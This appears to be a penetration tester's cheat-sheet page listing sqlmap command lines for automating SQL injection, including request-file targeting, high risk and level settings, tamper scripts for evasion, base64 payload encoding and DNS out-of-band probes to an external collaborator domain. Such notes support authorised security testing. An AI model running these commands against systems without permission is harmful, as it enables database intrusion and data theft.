SQLmap

Automate SQL Injections

Documentation

https://github.com/sqlmapproject/sqlmap/wiki/Usage

From Request - HTTP:80

sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 

From Request - HTTPS:443

sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 

or the http.request file needs to have special HTTP header Host: server:443

Batch Silent Mode without questions

sqlmap -r http.request --force-ssl --answers="follow=Y" --batch

DNS Collaborator (under root)

Tip: register new HTTP proxy on port 8081 and send all probes from sqlmap to this lister in order filter proxy history based on sqlmap listener.

Use --dns-domain switch to instruct nmap use DNS probes against your collaborator server

sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5

Tampering

Tampering scripts for payload encoding using --tamper switch.

sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode" 

A list of all existing tampering scripts is available using --list-tampers switch or looking at github repository /tamper folder

URL target & Parameters

sqlmap -u http://domain?id=1 -p id

You can read HTTP request from a file addressing payload by asterix symbol (*).

sqlmap -r ./sql.req

# sql.req is the following file containing HTTP request using  asterix () for parameter injection
GET /path/to/username*
Host: servername:port

HTTP Proxy

sqlmap --proxy=http://127.0.0.1:8080 

Databases

The most common DBMSs the remaining ones look at sqlmap wiki --dbms.

--dbms=mssql|mysql|postgresql|oracle

Base64 Encoding

By default sqlmap encode values in query string by URL encoding. When you need to encode payload using base64 encoding use the following switch with a parameter name

sqlmap -u domain?p1=value --base64=p1

HTTP method - DELETE

sqlmap --method=DELETE -u http://domain -p param1

Last updated

Was this helpful?